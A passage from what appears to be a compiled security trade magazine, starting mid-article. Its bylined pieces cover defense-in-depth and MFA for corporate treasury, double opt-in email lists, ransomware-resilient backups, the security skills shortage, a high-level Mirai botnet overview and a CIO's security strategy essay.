theyre the curtailments, the strict limitations, of administrator rights. Smart, aggressive control
of administrator rights can neutralize around 85% of malware attacks.
The drawbridge and sentries are password controls. Eliminate stolen passwords and youll turn
back almost all of the remaining intrusion attempts. About 14 percent of them.
But if, somehow, an attacker climbs the wall or digs underneath it, the vigilant guards that will
nab him are the two-factor authentication brigade. Thats the final one percent of protection.
Lets carry the castle analogy just a bit further. It will be much harder to defend the castle if you
dont keep the walls mortared and if you dont keep the food and ammunition supplies fresh and
plentiful. Thats your hardware and software. Keep it current, and keep it patched.
Finally, if your soldiers and sentries are untrained or lazy, it doesnt matter how strong your
walls are. The human factor has always posed the biggest risk in cybersecurity. All of your
employees have a part to play. So keep them trained and informed. Whether they realize it or
not, theyre on duty all day, every day in the fight against cyber-thieves.
An Attack-in-Depth
The Dyre Wolf campaign against banks shows just how sophisticated the hackers have
become. Discovered and named by IBM researchers, its an invasion-in-depth, a mirror image of
a defense-in depth. Dyre Wolf has pulled off several million-dollar heists from banks and
corporations.
Run by criminals in Eastern Europe, Dyre Wolf uses spear phishing or spam emails to get a
foothold in the system. Then its minions post phony dialogue boxes about system errors,
prompting a phone call to a fake service center. They lure employees of the target company into
revealing their passwords and authentication codes over the phone. They also post spoofed
web sites, where gullible employees think theyre logging in.
Within seconds, millions of dollars get whisked away through a maze of foreign banks. The
attackers frequently launch a Distributed Denial of Service (DDoS) attack on the target bank to
prevent it from seeing what just happened.

This is all very scary. But the first, essential break in the target banks defenses came when an
employee or some other insider such as a vendor allowed a download of malware. The enemy
made it through the castle walls and plucked the keys to the castle keep from another
employee.
IBMs 2015 Cyber Security Intelligence Index, which describes Dyre Wolf in detail, stated that
55 percent of all attacks recorded in 2014 were carried out by those who had inside access to
the target companys systems. Some of those insiders were malicious; others were unwitting
dupes.
Elsewhere in that report, IBM states that 95% of actual breaches were caused by human error.
So, by now it must be obvious. Youre only as strong as your weakest link, and that link is
almost always an employee. So what to do?
Building A Defense
Lets return to the castle and its walls, moat, and sentries. Lets also narrow our discussion to
the breaches that keep bankers and corporate treasurers tossing and turning: those that result
in unauthorized transfers of money.
In broad strokes, if you start from a secure base, a system in which nobody has rights to
anything, and then you open it up to people or processes as necessary, then your solution will
be secure and will enable people to do things that must be done.
On the other hand, if you start with a system that is wide open and proceed to lock things down,
you inevitably will miss locking or closing certain doors. Moreover, as things change, as people
come and go or acquire new privileges and responsibilities, youve got to be especially vigilant
in monitoring everyone and in shutting down additional doors. Its far easier to grant as
necessary rather than trying to deny access once some change occurs.
Lets assume that an attacker has fooled someone into downloading malware onto his or her
computer. How much damage can that do? Some, of course, but you can limit it substantially if
the infected computer does not have access to administrator rights.
If the user of said computer is a standard or least privilege user, then the worst-case damage
will be limited to what that user can do. It cant change files, install software, change processes,
and so on. In other words, it would not allow the types of changes to the SWIFT messages that
hit the Bangladesh Bank.
The 2014 Microsoft Vulnerabilities Report by Avecto, a UK software firm, states that 97% of
critical Microsoft vulnerabilities could be mitigated by removing admin rights across an
enterprise.

One of the reports key findings almost reiterated the point: 97% of Critical Remote Code
Execution vulnerabilities could be mitigated by removing admin rights.
The report explains mitigation in stating a standard user account either nullifies the
vulnerability itself or nullifies the impact of the vulnerability by preventing the exploit from gaining
elevated privilege throughout the user.
The Avecto report dealt with Microsoft vulnerabilities. But applications like Flash and Java can
be exploited as well. Granting admins right to them, or to any other application with known
vulnerabilities, is to be courting disaster.
Privilege management is not a panacea. If youve got sturdy castle walls but the drawbridge is
open, the barbarians will storm through the gate. At that point youre relying on your guards.
But who is verifying the guards activities the familiar question Whos guarding the guards?
Some guards need access to sensitive areas of the castle. Who is verifying that theyre doing
everything they must be doing, but only what they must be doing. This is where auditing comes
in. Remember the percentage of attacks that stem from human error. Some errors are
inadvertent; others are deliberate. Does an independent party review your logs, daily, of who
accesses production servers? Do you have somebody who is independent of the guards
function reviewing these accesses? It is similar to the dual control of cash practiced by banks,
or the requirement for four eyes needed to complete an action.
Limitations
Think about what kinds of applications your employees need in order to do their jobs. Do they
need Flash installed? Or Java? Perhaps you should consider having application whitelist, to
specify what can be installed on company machines, and what will be blocked by default.
Most applications installed by users have little to do with their jobs. They may go onto
Facebook. They may have a Google Dropbox. They will install things to do at lunchtime. If a
company does not know what applications its employees have installed, or how they are using
them, then the company will have no control over the information that is flowing through users
machines on the network.
Policies And Passwords

In the case of the Philippine Bank breach mentioned above, the bank was using a $25, second-
hand router. It also had no firewalls and used default passwords. Human error, anyone?
By now, it should be obvious to any user of IT that their passwords should be in a format that is
hard to guess or to discover through algorithms. Passwords should also be changed frequently.
Company policies should mandate such approaches. It is a very easy thing to enforce password
complexity. Companies should also routinely test passwords to see if they can be broken easily.
The whole issue is so familiar that we neednt go through it here. Still, theres a distressing
proportion of computer users whose password is password or 123456.

Single Sign-On
Single Sign-On (SSO) is another effective countermeasure. With SSO, a session and user
authentication service permits a user to use one set of login credentials (e.g., name and
password) to access multiple applications. It is easy to set up and manage. There are many
third-party products, including Microsoft Active Directory Federated Service (ADFS) that work
well. They balance out the tradeoff between ease of access for the end user and tight,
documented security for the auditors and internal security team.
With SSO, mandated password changes are easy. You only have to change the password in
one place to update if for every application that supports SSO. You dont have to go into every
system and individual application. Managing multiple passwords, and having to remember them
for every system, causes a great deal of user frustration and password-related errors.
Because SSO is authentication by a trusted server within the company network, third-party
applications like GTreasury do not have to make their own determination that a given users
credentials are valid. Then, third parties can use the same trusted source that the company is
using for its users identification and validation.
Multi-Factor Authentication
Multi-factor Authentication (MFA) combines something you know a password with
something you have. The something you have portion might be a physical token with a
distinct, encrypted security code. It might also be a message sent to a mobile phone or a laptop
computer. Even if some hacker penetrates your network and steals your password, he cant
make off with the goods unless he also gets hold of the other authenticating factor.
MFA does not just need to be on login. It could also come into play at any functional point of
using an application such as approving a payment.
The Dyre Wolf guys scored despite MFA because they succeeded in getting both pieces of the
puzzle. With faked phone calls and spoofed web sites, they tricked the victims into revealing or
entering essential information like security codes or passwords. Again, this shows that no
technology is foolproof if humans mishandle it. It also shows the need to layer security, rather
than to rely on any one method or solution component.
Mobility And The Cloud

If you do a good job of restricting administrator rights, of managing identities and passwords,
and of implementing two-factor authentication, youre showing that youre serious about cyber-
security. Your auditors will approve; so too should your lawyers and law-enforcement
authorities.
Data breaches are a real threat nowadays, even for companies that are diligent about security.
If your companys systems are breached, your legal liability may be much less if you have
followed a strategy of defense-in-depth than if you were oblivious to best security practices. In
the event of the latter, there could be additional or punitive damages assessed.

Cautionary Tales
If youre a corporate treasurer, be very careful about using your home computer or your mobile
device. If youre in an airport, for instance, you might inadvertently login onto a Wi-Fi that looks
legitimate named something like Lagardia or Heatrow and send critical data to a hacker
for a man-in-the-middle attack.
Again, going back to the human element, remember that terminated employees arent fully
terminated until they no longer have access to any of your systems. When you dismiss
someone, you shut off access to the internal network. But do you use one or more cloud-based
services? If so, someone has to go out and delete the departed individual from every one. It
takes some extra work and doesnt happen automatically unless your cloud providers web
services offer to disable terminated users accounts.
Once more to our castle analogy, we find that cloud computing might just allow potential
invaders to glide right over the castle walls and drop in from the sky. You still need vigilant
sentries to spot them. Youll need to give the sentries some accurate, long-range crossbows to
nail them even before they land.
Or maybe weve had enough comparisons with the Middle Ages. Lets move into modern times
and sum it up by thinking of cyber-security as we think of that great American game, football.
They say that offense wins games but defense wins championships. And what do you need to
build a champion defense?
A well-thought-out game plan your security policies and procedures.

A defense-in-depth consisting of big strong linemen, heady and agile linebackers,
and fleet defensive backs your tightly controlled admin rights, robust passwords
and identity management, and two-factor authentication.
And most importantly, your players talented, well prepared, and thoroughly
drilled. The entire squad, from the highest-paid starters to the least-used
substitutes. Your employees. Theyre the ones who do the work; theyre the
ones on whom you rely.
About The Author
Mattew Stockham currently oversees GTreasurys product development, technical support, and
IT operations. He has over 17 years of experience in development and technology and
continues to be an asset to the growth of GTreasury. Matthew can be reached online at
info@gtreasury.com and at our company website https://gtreasury.com/

How Does A Double Opt-In Help Keep Your Email Spam Free?
Email marketing should be a core component of any online marketing campaign. Email gives
marketers the ability to connect directly with leads, which is all good if the lead wants to be
connected with, but if they dont, it can have negative implications for a businesss reputation
and the deliverability of its email. Think about what the ideal mailing list looks like. The dream
list consists of email addresses that correspond to individuals who are interested in the products
a company sells. Theres at least a chance that sending an email to these people will result in
an open and a purchase. There are three basic approaches to building an email list: no opt-in,
single opt-in, and double opt-in. Im not going to talk about the first of these: the no opt-in
approach amounts to building email lists without the permission of users a practice which is
almost indistinguishable from spamming.
Single opt-ins are a popular option with marketers. A single opt-in occurs when someone
submits their email on a web form, signaling theyre interested in receiving emails from a
company. A double opt-in is the same as a single opt-in with the addition of an extra check. An
email is sent to the submitted address. To be added to the email list, the lead has to click a link
in the email. Each approach has clear benefits. Single opt-ins are quick and theres no likelihood
of confusion. Studies have shown that single opt-in processes result in more sign-ups. With
double opt-in processes, a large percentage of potential leads dont complete the second step.
Single opt-ins also have clear negatives. An email address might land on a single opt-in
emailing list without being submitted by its owner. Spambots, scammers, and fake subscribers
are common as are misspelled email addresses. Single opt-in processes produce email lists
with a lot more noise in them then double-opt in processes. That noise can have disastrous
consequences for a companys ability to get email delivered. If your email list contains
addresses of people who arent interested in your product and didnt intend to sign-up, youll
send them emails they dont want to receive. In many cases, the receivers reaction will be to
mark the email as spam, sending a signal to email inbox providers and blacklist maintainers that
your IPs and domains are spam sources.
Marketers Ive talked to about this issue often complain double opt-ins reduce their sign-up
rates. Theyre right, it will but thats the point. The goal of email marketing is to send
messages to promising leads. Total number of sign-ups is a great vanity metric, but it has almost
no bearing on whether an email list is an effective marketing tool. A list of 1,000,000 random
emails is useless compared to a list of 10,000 leads who have expressed an interest in the
products being marketed. Using a double opt-in has two major upsides: it improves the quality
of your email lists and it reduces the chances that your ability to send email will be hurt by the
perception that youre sending spam.
About the Author

Ciara Noonan -- Ciara works as a tech writer for MailChannels, a provider outbound email
filtering and email delivery solutions for service providers. Follow MailChannels on Twitter at
@mailchannels and check out their blog, http://blog.mailchannels.com/.

How good is your backup?
Ideally, the crypto ransomware epidemic shouldnt be much of an issue these days. Cost-
efficient or even free data backup services have become available to the public over time.
Indeed, its now easier and cheaper than ever before for enterprises and consumers to have a
viable plan B in case of a ransomware compromise or critical hardware failure.
Despite this fact, end users sensitive information is still a low-hanging fruit in the face of
ransomware attacks.
Furthermore, hospitals, police departments, transportation companies and other organizations

keep losing their data due to weak incident response practices that do not revolve around
dependable data backup techniques.
The FBI provides alarming statistics in this regard: consumers and companies in the United
States alone paid over $209 million in ransoms in the first quarter of 2016. Thats a huge
amount and a drastic increase compared to $25 million lost during the whole previous year.
But why are backups failing to safeguard data against ransomware? Money is part of the
answer.
In pursuit of reducing their IT spending, some companies dont create reserve copies of all their
important files or dont perform backups as frequently as they should.
Some organizations maintain comprehensive backups but dont test them properly, so it turns
out they are unable to restore the information in case of emergency.
Another mistake is to store backups on network drives since high-profile ransomware targets
these repositories along with local drives.
How many backups will do the trick?
Being a little paranoid is probably a good thing when it comes to data backups. Owing to
relatively inexpensive cloud storage and specially crafted solutions, organizations can afford to
keep a large volume of their proprietary information in a safe place.
The trade-off between cost and protection isnt nearly as relevant now in 2017 as it was a
decade ago. IT executives should run backups often enough to make sure the latest versions of
important files can be restored when necessary.
Another facet of the problem is that backing up valuable files alone might not suffice. It may also
be mandatory to roll back entire workstations to their earlier healthy state.
The San Francisco Municipal Transit Agency (SF Muni) hack as of late November 2016
demonstrated how important it is to keep critical computers backed up.

A ransom Trojan called HDDCryptor infected about 2,000 machines on the agencys network.
In the upshot, Munis automated faring service, email and print servers, CAD machines, lost and
found property terminals, as well as employee training and payroll systems ran out of service for
several days.
The threat actors demanded a ransom of 100 Bitcoins (about $73,000) for data and systems
recovery.
If the organization had recent images of the compromised computers readily available, they
could have simply formatted the hardware and reinstated it to the latest unaffected version.
Moreover, its not mandatory to keep multiple images of each machine. Instead, incremental
backup solutions will only store the most recent copy of a system to roll back to.
Testing backups as the rule of thumb
The complexity of large organizations data structure poses a hurdle to implementing an

effective backup strategy. Such enterprises store heterogeneous information and use different
types of systems, so it may be difficult and time-consuming to verify the efficiency of the
recovery process.
Therefore, a company may be doing backups regularly but still stay unprotected against
ransomware and suchlike predicaments, because the IT team never tested their backups
properly.
System administrators need to bank on testing otherwise backups are no use.
Keeping backups out of criminals sight
Data backups are cyber extortionists worst nightmare, so they configure their ransomware to
scour infected computers for them.
Some sophisticated strains of ransomware are capable of encrypting files on network drives,
both mapped and unmapped.
Thats where backups often reside. Any data repository tied to a contaminated machine is
potentially at risk.
This also applies to external media mounted to a particular computer, such as hard drives and
USB memory sticks.
Enterprises should adopt network segmentation to restrict user access to backups. Employees
only need this access for emergency rather than on a daily basis.
For routine incidents when files are accidentally deleted, commonplace file syncing services will
fit the bill.
A multi-layered backup strategy
File syncing services are invaluable for maintaining day-to-day backups. They continuously
make and store snapshots of files that are in use to make sure the latest versions thereof are
backed up.
If these solutions cannot be used for whatever reason, physically backing up important
documents to a USB stick several times a day is just as effective, although certainly not as
convenient.
For medium-term backups, its recommended to keep valuable data and recent clean images of
critical systems on storage devices that are reliably segregated from the enterprise network.
Encrypting these backups will add an extra layer of data protection.
To implement long-term backups, organizations should resort to offsite storage practices. The
data repository needs to be physically isolated from the rest of the companys IT network.
In other words, these backups should be completely off limits to employees so that a
ransomware infection wont propagate to the storage if it ends up on a specific workstation.
Administrators should ascertain that these backups are comprehensive enough to get the entire
network up and running in case an infection takes its critical data and systems hostage.
About the Author
David Balaban is a computer security researcher with over 15 years of

experience in malware analysis and antivirus software evaluation. David
runs the Privacy-PC.com project which presents expert opinions on the
contemporary information security matters, including social engineering,
penetration testing, threat intelligence, online privacy and white hat
hacking.
As part of his work at Privacy-PC, Mr. Balaban has interviewed such

security celebrities as Dave Kennedy, Jay Jacobs and Robert David Steele to get firsthand
perspectives on hot InfoSec issues. David has a strong malware troubleshooting background,
with the recent focus on ransomware countermeasures.

How to survive the cybersecurity expertise shortfall
By Franois Amigorena, CEO, IS Decisions
Analysts everywhere are fretting about the lack of cybersecurity professionals across the world.
The Cybersecurity Jobs Report believes the global shortfall of cybersecurity workers will reach
1.5 million by 2019. (ISC)2 believes the shortfall will reach 1.8 million in five years.
These figures are having an intense effect on businesses, who are very much starting to feel the
pinch. A recent report by the Intel Security and the Centre for Strategic and International Studies
(CSIS) found that 15% of cybersecurity positions in companies will go unfilled by 2020 with
most businesses saying the skills shortage is worse than talent deficits in other IT professions.
The reason, according to many of the respondents in the CSIS study, is the education system
within each country, which doesnt prepare students for the industry. As with any security role,
education is key, but why does the emphasis lie on cybersecurity professionals alone?
The weakest point in any organisations cyber defences is the people, ergo, education should
be a part of everybodys working life not just the lives of the experts. In fact, education is
arguably more important when it comes to the average employee than an IT-savvy administrator
because the average employee is the one who needs it the most. In the same way that those
who need to go to the doctor for help are the sick, not the healthy.
Every employee, from the intern to the CEO, needs to be aware of the cybersecurity risk they
pose to their own company. If theyre not, the consequences can be disastrous. Just look at the
recent cyberattacks on companies like Anthem, Sony, eBay, Dropbox and Sage. With Anthem,
78.8 million customers details were leaked. With Sony, 100 terabytes of sensitive data was
stolen. Dropbox suffered to the tune of 68 million customer account details being stolen. 233
million customer account details were hacked with eBay, and 280 UK clients were compromised
in the Sage attack. What was the common factor underpinning each of these attacks? A
compromised login from an average-level employee that fell into the wrong hands.
Hackers love exploiting the naivety of employees because its so easy. All it takes is one
successful phishing email to persuade just one employee to hand over their corporate login
details. Then a hacker effectively has a company key into a safe house of valuable information.
And once that hacker gains entry to your systems, youre not going to find out until its too late
your anti-virus and perimeter systems arent programmed to pick up on access using
legitimate login details, giving snoopers all the time in the world to, well, snoop.
The key to protecting against these types of security breaches is a mix of education and
technology.

In terms of education, companies must do more to formalise the security training they give
employees from the day they join the company, right through to when they leave. It doesnt
matter what job level someone joins at. Everyones a risk, so everyone needs training.
And while training is hugely effective, humans are always human, and will be prone to making
mistakes. Technology, therefore, is essential in mopping up any errors that happen, and can
provide protection in two parts restricting access (prevention) and networking monitoring
(cure).
Restricting access
And as prevention is always better than cure, companies need to do more to protect their
networks from hackers using compromised credentials. By restricting access to certain
workstations, geographies, times of day, or IT-approved employee-owned devices, a hacker
cant gain entry using a legitimate login because theyd be logging in from the wrong device, the
wrong location or at the wrong time of day. Restricting access in this way narrows the window of
opportunity for hackers.
Network monitoring
But for those attackers who do end up logging in to a corporate network perhaps they stole
an employees device or broke into your office effective network monitoring and file
monitoring can mitigate any damage. Autonomous monitoring can pick up on suspicious
network activity quickly, and alert an administrator before a hacker has a chance to steal any
information or snoop around. To use an analogy, its akin to catching a burglar mid act and tying
them up before the police arrive.
Crucially, both of these kinds of technologies wouldve prevented the high-profile attacks on
Anthem, Sony, eBay, Dropbox and Sage and both would help small businesses to keep their
sensitive data safe. And in a world where cybersecurity skills are lacking, its the least
companies can do to get through troubled times.
About the Author
Franois Amigorena is the founder and CEO of IS Decisions, and an expert

commentator on insider threat issues.
IS Decisions is a provider of infrastructure and security management software

solutions for Microsoft Windows and Active Directory. The company offers
solutions for user-access control, file auditing, server and desktop reporting,
and remote installations.
Its customers include the FBI, the US Air Force, the United Nations and Barclays each of
which rely on IS Decisions to prevent security breaches; ensure compliance with major
regulations; such as SOX and FISMA; quickly respond to IT emergencies; and save time and
money for the IT department.

How to save your critical data using smart backup procedures?
By Milica D. Djekic
The disasters and discontinuities in work are not the rare occurrences, so we should get ready
to protect our vitally significant assets from any sort of loss or corruption. The disasters could
happen whenever and they are not the consequences of cybersecurity incidents only. They may
be the result of a weak electricity management, weather conditions, earthquake or any other
natural phenomena getting a potential to cause damage.
Through this article, we would talk a bit more about your IT assets, ways of losing their data and
some good plans and strategies of recovering what you got as threatened.
The data could get lost or corrupted anywhere and anytime causing a business discontinuity
and so commonly its entire collapse. From such a perspective, its strategically significant to
save your critical data. In order to obtain so you should use both software and hardware.
The software are those

programs supporting you
in saving your data and
applications, while the
hardware could be
different devices such as
USB sticks, external
discs, optical devices
and tapes. How often
you would do backuping
depends how fast you
would produce your
critical data.
Some organizations
would backup their computers on a daily basis, while many would do so weekly or monthly. Its
important to suggest that backuping as well as recovering the entire machines could get time-
consuming.
This means that if you do any backuping or data recovering you should count on some sort of
business discontinuity that could cost you in a financial manner.
On the other hand, its much better to do some backuping, because if you lose your critical data
it could cost you shut downing the entire business. Unluckily, the tendency in many parts of the
world is still quite concerning.

Some leading international institutions would issue many research efforts suggesting how this
sort of prevention could be important, but many enterprises, organizations and businesses
would suffer the lack of such a good practice.
The smart procedures would indicate that we should choose to do some backup periodically
depending on our needs and also apply a good data recovery in case of a disaster.
The backuping is nothing else, but recording your confidential data on some devices and
dealing with the installation discs in case you lose your licensed software, program or
application.
The good thing is that the majority of those applications could be found on the web and
downloaded for free, while some of them would seek their serial number in order to get used.
Finally, its important to discuss how smart backuping procedures could save your IT
infrastructure. As its well-known, the computers are replaceable devices and if they suffer
damage and cannot get repaired they could get replaced with the new machines.
The point is all their confidential data would previously get backuped on some of the hardware
and they would get recovered on the new computers.
The well-known case from a practice is a thunderstorm when data get lost or corrupted due to a
strong external magnetic field. Also, we would not decrease the significance of possible
hackers operations that could make your data being stolen and lately destroyed using some
malware applications.
At the end, we would appeal on the Law Enforcement agencies working over the globe to deal
proactively with these sorts of concerns and suggest some of the best practice getting applied in
their countries. As a consequence this sort of action would get much safer cyberspace and
less risk form the economical collapses.
About The Author
Since Milica Djekic graduated at the Department of Control Engineering at

University of Belgrade, Serbia, shes been an engineer with a passion for
cryptography, cyber security, and wireless systems. Milica is a researcher
from Subotica, Serbia. She also serves as a Reviewer at the Journal of
Computer Sciences and Applications and.
She writes for American and Asia-Pacific security magazines. She is a volunteer with the
American corner of Subotica as well as a lecturer with the local engineering society.

Mirai Botnet
A Sign of DDoS to Come
by Charles Parker, II; InfoSec Architect
Attackers are always looking for new and novel methods of attack. These initially may be
difficult to defend against, as these were new to the environment.
Of the recent attacks, Mirai has been a major contributor to the malware business.
This has created quite a stir in the market. Mirai was coded to target embedded systems and
IoT devices as tools to spread the malware and also as attack tools. This malware sample is
notable in that this malware created the largest DDoS attacks recorded to this junction.
This has been shown to be a rather significant issue for those affected, even with a DDoS
protection app in place with third party vendors.
Targets
The Mirai attack does not have a specific set of targets in mind. This bot army focuses its
energy on any particular target based on any number of reasons, from the person or entity.
Each time the bots are rented, a specific target is chosen.
The prior publicized targets have been Krebs on Security (620 Gps), Deutsche Telecom,
KCOM, Irish telco Eir, the French internet provider OVH (1.1 Tbps), Dyn, and others.
Method of Attack
The attack has evolved over time. Initially, Mirai utilized routers manufactured by the Taiwan
company ZyXEL.
This particular router posed the vulnerability with port 7547, a maintenance interface, using the
TR-064 and TR-069 protocols.
Once exploited, the unauthorized third party may access and alter the router LAN configuration
and become part of the bot army.
Originally they began with 200K bots. Now, there are over 400K bots to carry out the attacks.
There could be as many as 5M routers that could be vulnerable to this exploit. These bots have
a minimum rental period of two weeks.
For the person renting the destructive bots, the number of bots and duration drive the cost. The
attack may be extended, as this has been coded to spoof the individual bots IP address.

This works to appear to be a new node that had not been blacklisted yet.
Remediation
This has been a rather significant issue and alarming trend. This attack alone has garnered a
mass amount of attention and press, cost the targets large amounts of money, and at times lost
their DDoS defense vendor.
As this issue brings much attention to the weak link, the equipment manufacturers have started
to focus on reviewing the issue. As an example, ZyXEL began to investigate this issue.
The vulnerability allegedly was arising from one of the chipset providers (Econet) with chipsets
RT63365 and MT7505. As of December 2016, ZyXEL was working on a patch.
Another option is to place the equipment behind a firewall or NAT with no ports exposed. This is
important as with this being exposed, it is vulnerable. A rather short-term yet effective
remediation for this issue is to reboot the equipment.
This clears the memory, removing the issue. This, although effective is problematic as this may
be reinfected with little effort. As an additional step, the default password should be changed.
Vendors & IoT

There has been a continuing issue where the vendors and IoT security meet. These devices
have overlooked security for years, via using insecure protocols, not securing the devices
communication, and most of other factors.
The persons devising attacks clearly have taken notice of this and are exploiting the IoT devices
left and right.
Summary
There are only a few mass attacks that have been on this level and with such immediate
devastation. A business could be attacked for no reason and suffer the detrimental effects
About The Author

Charles Parker, II began coding in the 1980s. Presently CP is an
Information Security Architect at a Tier One supplier to the automobile
industry. CP is presently completing the PhD (Information Assurance and
Security) with completing the dissertation. CPs interests include
cryptography, SCADA, and securing communication channels.
He has presented at regional InfoSec conferences. Charles Parker, II can be

reached online at charlesparkerii@gmail.com and InfoSecPirate (Twitter).

IT Security - Lost Cause?
Overcoming the Nightmare of Cyber Security
Robert Mills Blacksands Inc.
THE BATTLE IS LOST - BUT NOT THE WAR
My first IT security failure was experienced in the 80s when my modem based AOL account
started sending all my contacts malware. Over the years, working my way up to a CIO position,
my problems with security only became exponentially worse. I don't need to explain how bad it
has become - you know. You probably have similar war stories that you may or may not wish to
share with others. We all share the scars of battle the battle between the hackers and the
protectors of data, IP and company integrity!
In the very near future, we will see quantum computers become more commonplace.
Computers capable of braking all current encryption in minutes. Billions of IoT devices with no
effective way to set passwords or do updates will be in existence and connected to everything.
Terabytes of wild malware and possibly even more concerning, state sponsored hackers who
have more training and better tools than any company can match. Managing the plethora of
stakeholders, using everything from IoT devices to BYOD home computers is out of control. We
are losing the battle, being overrun by malicious code, hackers and bad people.
I currently work with Strategy CIO, a premier boutique consulting company for high-end
executive consultants, and I am a board member for several companies, one of which includes
Blacksands, Inc. Blacksands, Inc. is a software security company that has advanced endpoint
management and security software. I have seen the capabilities of numerous companies in
many industries and most simply do not have the skills, tools, infrastructure, governance or
management of policies that it would take to even attempt to protect themselves, their IP or their
data. The advanced companies that do have some of these things, often have major holes and
are often still at significant risk.
So why spend any money or put any resources in place if we are losing and there is no
assurance. This answer is simple. If you lose and the hackers win, the cost and impact to your
company can be staggering. Never give up, never surrender. At present, breaches are
common and have a high probability of occurrence. It is your fiduciary responsibility to use
diligence to protect your company, its brand and reputation and its assets to the best of your
ability and resources. Even though middle management often resists providing the resources
needed due to budget constraints or the need to meet month end or year end figures, the
president, CEO and board will agree that securing the company, its data, intellectual property
and integrity, is imperative for medium to long term and often short term survival.

SO WHAT TO DO
When you are losing a war, you need to develop a better battle plan (security strategy), obtain
bigger weapons (better tools) and secure more troops. There is no single magic bullet. We need
to dig in, fill in holes, use stronger security technology and be better. Assess the good, the bad
and the ugly and work with business leadership to understand what is needed and more
importantly, why it is necessary.
1. Analyze what is working and what is not. Old outdated security infrastructure simply
cannot keep up with the latest threats.
2. Build a strategy that can protect your company from current and future threats. Ensure it
is robust, fault tolerant and not dependent on human frailties. Use security in depth.
Dont create a system that is just difficult to hack, but near impossible.
3. Change what you are doing. Eliminate what is not protecting you. Add new technologies
to keep in the game. Put processes and governance controls in place to make sure that
your infrastructure is always on-line, working and that changes do not create new
vulnerabilities.
4. Do not assume you are smarter than hackers or that commercial tools will automatically
provide protection. Design, with the assumption that any visible system is at risk of
attempted hacks. Use strategy to twart attacks before they happen. Always assume: if
they can see it they will try to hack it.
WHAT IS NOT WORKING
The current paradigm assumes that if you have a firewall on your network, passwords on
everything and anti-malware on your computers that you have security. Nothing is farther from
the truth. So many large important companies have been hacked recently that the public is
becoming complacent, and almost numb to hearing about it. They all had some kind of IT
security in place.
Examples of failures include:

1. Trusting an employee will recognize a phishing email and not click, is a lost cause.
2. Lacking protection against threats from your own disgruntled employees
3. Passwords have reached old age. Assuming all users will choose unguessable
passwords or forcing complexity that makes users write them on Postit Notes is
hopeless.
4. Social engineering is staying with us. We need to assume all people are subject to
manipulation and design accordingly.
5. Firewalls with such complex rules, only one person in a business understand them. How
is it reliable if no-one is testing that they work as needed?
6. Antivirus tools that stop malware after a few days of analysis. What happens during
those few days between receipt, analysis and action.
7. Administrators with ability to change anything at will, with passwords that only they
know. Will this pass the litmus test during audit?

8. Laptops, desktops, phones and numerous IoT devices with connections to uncontrolled
hotspots using wire, WiFi, Bluetooth, Near Field and soon office lighting and satellites.
This creates uncontrollable holes galore in a companys network security.
9. LAN networks with unknown mapping of ports and that lack the ability to shut down ports
with suspicious behavior instantaneously.
10. Home computers (and devices, often with malware already embedded) that the
company has given direct access into companies networks.
11. BYOD requires tools, policy and the ability to protect the company from devices with
weak protection, and embedded malicious code.
Assuming logs and tools for detection provide security. They only monitor what has gone
wrong after the animals have left the barn they are useful, but don't protect you. Great for
post analysis and testing but they are not protection. A bit too late dont you think?
WHAT IS WORKING
1. Automated stakeholder management works so that every user, device and app is
managed.
2. Zero trust endpoint management.
3. Using techniques that improve resistance to hacking, invisibility of endpoints, honey
pots, secondary firewalls and data protection. These items help to make systems really
difficult to hack.
4. Two factor authentication, including for individual users. However, it must be in place
for each and every connection (phones, laptops, even IoT devices with a threat immune
infrastructure)
Blacksands security is a great example of these capabilities
5. Anti-malware software that uses heuristics to sense threats that have not yet been
identified.
Kaspersky is a good example of the use of heuristics.
6. Data protection, managing rules for what can or cannot be sent and received. This must
include encryption of all data and filtering what data can be received and sent. Watch out
for those quantum computers, a few already exist. Encryption algorithms are going to
need to be changed sooner than later to protect from quantum based code breaking).
Microsoft has strong capabilities in the data protection space.
A PLAN TO COVER ALL
Most of the time the security staff is so busy bailing water there is no time to patch the holes, let
alone row faster.

1. Make sure you have the in-house skills and capacity to properly implement security. If
not, train and or hire. You cannot fight a war without trained soldiers.
2. Once you decide to make your business secure, you must commit to producing and
executing a clear and effective security strategy. A security strategy is not what you
think you should do that is tactics, strategy is a comprehensive plan to become better
than you are.
3. Identify all the holes in your defenses and rate how well your current infrastructure can
handle them based on current and future threats.
4. Replace, or re-architect everything that is weak. Do not put vulnerabilities on the back
burner for a future budget. Explain to executive leadership, if they want to use
technology they need to do it securely. They really do not have a choice. Be frugal but
smart, cover all credible threats. and mitigate all risks.
5. Ensure processes and governance are in place to make sure management of the
security infrastructure is robust, tested regularly and has management controls to ensure
every element is carried out.
Will this be 100% secure? Absolutely not but it will be drastically better than before and you
will be demonstrating your due diligence to the board, that you have made every effort to protect
the company brand, intellectual property and assets. Not to mention the companys reputation.
MAKE IT HAPPEN
Hire an expert to bring in methodology, teach your staff how to create and most importantly how
to successfully execute a security strategy. This is not just paper, but a process, organization,
budget, management, governance, auditing, continuous improvement and a lot of hard work.
1. Make sure all the basics are solid, tested and have no holes.
2. Deploy zero trust endpoint management for every endpoint on every device and for
every stakeholder. One approach is to make the edge invisible to the rest of the
internet. To all illegitimate entities, protected applications and devices appear to be
disconnected. There is no way to fingerprint or breach a perimeter that is not visible.
Invisibility creates immunity against DoS attacks. Even high-end state sponsored
assaults are thwarted.
3. Deploy management of every stakeholder and enforce two-factor authentication for all
users, apps and servers. Using stakeholder management provides simple, instant, local
control and access to only secure connections, drastically improving the effectiveness of
the security infrastructure.
4. Deploy data protection for all data. Make sure all sensitive data is encrypted and that
tools are in place to control what can and cannot be exported from your company.
5. Make sure your anti malware has heuristics. Heuristics look for malware that has not yet
been identified and categorized. Make sure every device (including BYOD), inbound
email, all impoted data, USB, bluethooth, WiFi, nearfield, and Internet connection is
screened for malware. Screen all data that is imported into your company from

whatever source. Ensure your plan covers EVERYTHING. Think USB, hotspots, leave
no stone unturned.
6. Re-architect your existing security based on what is needed not what you have done in
the past. If you always do what you always did, you will always get what you always got.
7. Put written processes, governance and controls in place to manage the human element.
This is your chance to gain a secure business enterprise and the only way to stand a chance to
win this war on data protection.
P.S if you like this article please share it !
References:
1. Zero trust endpoint management: http://blacksands.danati.com
2. Two factor authentication: http://blacksands.danati.com
3. Stakeholder Management: http://blacksands.danati.com
4. Data protection: https://www.microsoft.com/en-us/security
5. Heuristics i.e. http://support.kaspersky.com
6. Security architecture: https://www.linux.com/news/nine-principles-security-architecture
7. Processes, governance and controls: http://www.iso27001security.com/html/27014.html
About the Author
Robert Mills is an award-winning IT executive consultant at Strategy CIO

and was formerly a VP, Business Partner & CIO at General Electric &
